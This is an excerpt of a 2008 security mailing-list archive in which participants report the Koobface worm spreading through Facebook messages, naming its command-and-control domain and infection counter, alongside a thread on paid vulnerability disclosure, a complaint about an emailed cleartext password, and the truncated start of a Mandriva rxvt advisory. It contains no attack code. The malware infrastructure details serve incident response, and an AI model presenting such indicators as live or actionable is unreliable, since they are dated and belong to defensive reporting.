http://tagline.hushmail.com/fc/Ioyw6h4fM6mUaUAfTcWMkR2Fx209IMXh1QMeRcp6eoXffMEOga9j6I/ From ge at linuxbox.org Thu Aug 7 02:45:30 2008 From: ge at linuxbox.org (Gadi Evron) Date: Wed, 6 Aug 2008 20:45:30 -0500 (CDT) Subject: [Full-disclosure] [funsec] facebook messages worm In-Reply-To: References: Message-ID: I am constantly updating on this on my twitter account to avoid list clutter: http://twitter.com/gadievron You can watch the infection live on a web counter from the hosting provider that the worm points to. This thing is fast-spreading. Gadi. On Wed, 6 Aug 2008, Gadi Evron wrote: > Hi all. > > There's a facebook (possibly worm) something malicious sending fake > messages from real users (friends). > > The sample also has a remote drop site (verified by someone who shall > remain nameless). > > This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help. > > Infection sites seen so far are on .pl domains. > > The AV industry will soon add detection. > Facebook's security folks are very capable, so I am not worried on that > front. > > It's not that we didn't expect this for a long time now, but... > Be careful. Some users know to be careful in email.. but not on facebook. > > Note: unlike 2003 when we called everything a worm and the 90s when > everything was a virus--this is a bot which also spreads/infects on facebook. > > Gadi. > > > -- > "You don't need your firewalls! Gadi is Israel's firewall." > -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant General, > Israel's Ministry of Finance, at the government's CIO conference, 2005. > > (after two very funny self-deprication quotes, time to even things up!) > > My profile and resume: > http://www.linkedin.com/in/gadievron > _______________________________________________ > Fun and Misc security discussion for OT posts. > https://linuxbox.org/cgi-bin/mailman/listinfo/funsec > Note: funsec is a public and open mailing list. > From ge at linuxbox.org Thu Aug 7 06:15:24 2008 From: ge at linuxbox.org (Gadi Evron) Date: Thu, 7 Aug 2008 00:15:24 -0500 (CDT) Subject: [Full-disclosure] [funsec] facebook messages worm In-Reply-To: <32463282.333111218085213497.JavaMail.juha-matti.laurio@netti.fi> References: <32463282.333111218085213497.JavaMail.juha-matti.laurio@netti.fi> Message-ID: On Thu, 7 Aug 2008, Juha-Matti Laurio wrote: > It has the following mechanism according to McAfee: > http://vil.nai.com/vil/content/v_148955.htm > > They use name W32/Koobface.worm and Kaspersky (Kaspersky Labs originally > discovered this threat) uses name Net-Worm.Win32.Koobface.b. This is going to *possibly* cause support line bottlenecks tomorrow. This worm is somewhat similar to zlob, here is a link to a kaspersky paper on a previous iteration of it, they call it koobface: http://www.kaspersky.com/news?id=207575670 The worm collects spam subject lines from, and then sends the users personal data to the following C&C: zzzping.com I spoke with DirectNIC last night and the Registrar Operations (reg-ops) mailing list was updated that the domain is no longer reachable. That was very fast response time from DirectNIC, which we appreciate. The worm is still fast-spreading, watch the statistics as they fly: http://www.d9.pl/system/stats.php The facebook security team is working on this, and they are quite capable. The security operations community has been doing analysis and take-downs, but the worm seems to still be spreading. All anti virus vendors have been notified, and detection (if not removal) should be added within a few hours to a few days. For now, while users may get infected, their information is safe (UNLESS the worm has a secondary contact C&C which I have not verified yet). It seems like some users may have learned not to click on links in email, but any other medium does not compute. Gadi. > More information here too: > http://www.pcmag.com/article2/0,2817,2327272,00.asp > > Juha-Matti > > "John C. A. Bambenek, GCIH, CISSP" [bambenek.infosec at gmail.com] kirjoitti: >> What's the infection vector? URL Link? Rouge Facebook app? >> >> On Wed, Aug 6, 2008 at 4:44 PM, Gadi Evron wrote: >> >> > Hi all. >> > >> > There's a facebook (possibly worm) something malicious sending fake >> > messages from real users (friends). >> > >> > The sample also has a remote drop site (verified by someone who shall >> > remain nameless). >> > >> > This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his >> help. >> > >> > Infection sites seen so far are on .pl domains. >> > >> > The AV industry will soon add detection. >> > Facebook's security folks are very capable, so I am not worried on that >> > front. >> > >> > It's not that we didn't expect this for a long time now, but... >> > Be careful. Some users know to be careful in email.. but not on facebook. >> > >> > Note: unlike 2003 when we called everything a worm and the 90s when >> > everything was a virus--this is a bot which also spreads/infects on >> > facebook. >> > >> > Gadi. >> > >> > >> > -- >> > "You don't need your firewalls! Gadi is Israel's firewall." >> > -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the >> > Accountant General, >> > Israel's Ministry of Finance, at the government's CIO conference, >> > 2005. >> > >> > (after two very funny self-deprication quotes, time to even things >> up!) >> > >> > My profile and resume: >> > http://www.linkedin.com/in/gadievron > From ge at linuxbox.org Wed Aug 6 22:44:03 2008 From: ge at linuxbox.org (Gadi Evron) Date: Wed, 6 Aug 2008 16:44:03 -0500 (CDT) Subject: [Full-disclosure] facebook messages worm Message-ID: Hi all. There's a facebook (possibly worm) something malicious sending fake messages from real users (friends). The sample also has a remote drop site (verified by someone who shall remain nameless). This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help. Infection sites seen so far are on .pl domains. The AV industry will soon add detection. Facebook's security folks are very capable, so I am not worried on that front. It's not that we didn't expect this for a long time now, but... Be careful. Some users know to be careful in email.. but not on facebook. Note: unlike 2003 when we called everything a worm and the 90s when everything was a virus--this is a bot which also spreads/infects on facebook. Gadi. -- "You don't need your firewalls! Gadi is Israel's firewall." -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant General, Israel's Ministry of Finance, at the government's CIO conference, 2005. (after two very funny self-deprication quotes, time to even things up!) My profile and resume: http://www.linkedin.com/in/gadievron From dennis at conus.info Thu Aug 7 15:14:14 2008 From: dennis at conus.info (Dennis Yurichev) Date: Thu, 7 Aug 2008 17:14:14 +0300 Subject: [Full-disclosure] question Message-ID: <532075.20080807171414@conus.info> Hello, Are there any well-known vendors who would like to buy 0day exploits for their own products? -- My PGP public key: http://yurichev.com/dennis.yurichev.asc -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 183 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080807/21f843f3/attachment.bin From wilder_jeff at msn.com Thu Aug 7 17:09:12 2008 From: wilder_jeff at msn.com (wilder_jeff Wilder) Date: Thu, 7 Aug 2008 10:09:12 -0600 Subject: [Full-disclosure] When will they ever get it !?!?!?! Message-ID: As you will all know I am one never to post, but I had to bring this to a discussion point. I received an e-mail today from the Gallup Journal inviting me to join their LEET management spam list. Within this inventation, they had provided me with my username (Ahhh how nice) and my password ({GASP} OMG!) in clear text (WTF!). So, I track down the domain admin... she has no idea... I get run through the support gauntlet until I assist upon supervisor, Please hold. As I sit and listen to something that should be played at a funeral, not much further from the death march, I was graciously hung up on; the man is now pissed. I wouldnt be so upset had this username and password ( be generic or single use) but it is from and active websites that I currently visit. I can understand if I had asked them to send me a password... or had a formal relationship with them; however, this is not the case. I was wondering if anyone else received this same e-mail? As a security assessor, I see so many large companies that just dont get it. What will it take for an orginization such as Gallup to understand the fundementals of security. -enjoy! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080807/64e29c69/attachment.html From Valdis.Kletnieks at vt.edu Thu Aug 7 16:56:43 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Thu, 07 Aug 2008 11:56:43 -0400 Subject: [Full-disclosure] question In-Reply-To: Your message of "Thu, 07 Aug 2008 17:14:14 +0300." <532075.20080807171414@conus.info> References: <532075.20080807171414@conus.info> Message-ID: <34751.1218124603@turing-police.cc.vt.edu> On Thu, 07 Aug 2008 17:14:14 +0300, Dennis Yurichev said: > Are there any well-known vendors who would like to buy 0day exploits > for their own products? Yes, there are. Next question? -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080807/5d445940/attachment.bin From dennis at conus.info Thu Aug 7 21:22:40 2008 From: dennis at conus.info (Dennis Yurichev) Date: Thu, 7 Aug 2008 23:22:40 +0300 Subject: [Full-disclosure] question Message-ID: <157137144.20080807232240@conus.info> Hello, I'm sorry, I wrote my question incorrectly. I meant, who among software companies would like to know about vulnerabilities in their own products and *also* would like to pay for this? It's possible to work with them as independent security researcher? -- My PGP public key: http://yurichev.com/dennis.yurichev.asc -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 183 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080807/91588bb2/attachment.bin From security at mandriva.com Thu Aug 7 21:51:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 07 Aug 2008 14:51:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:161 ] rxvt Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:161 http://www.mandriva.com/security/ _______________________________________________________________________ Package : rxvt Date : August 7, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: A vulnerability in rxvt allowed it to open a terminal on :0 if the environment variable was not set, which could be used by a local user to hijack X11 connections (CVE-2008-1142). The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1142 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: 57b033071ca6cf454e53679cfc946215 2007.1/i586/rxvt-2.7.10-16.1mdv2007.1.i586.rpm 987dfd1fc331f8047320a567205f2b0e 2007.1/i586/rxvt-CJK-2.7.10-16.1mdv2007.1.i586.rpm 22d14c838873f3a5a12953ddc80b379f 2007.1/SRPMS/rxvt-2.7.10-16.1mdv2007.1.src.rpm Mandriva Linux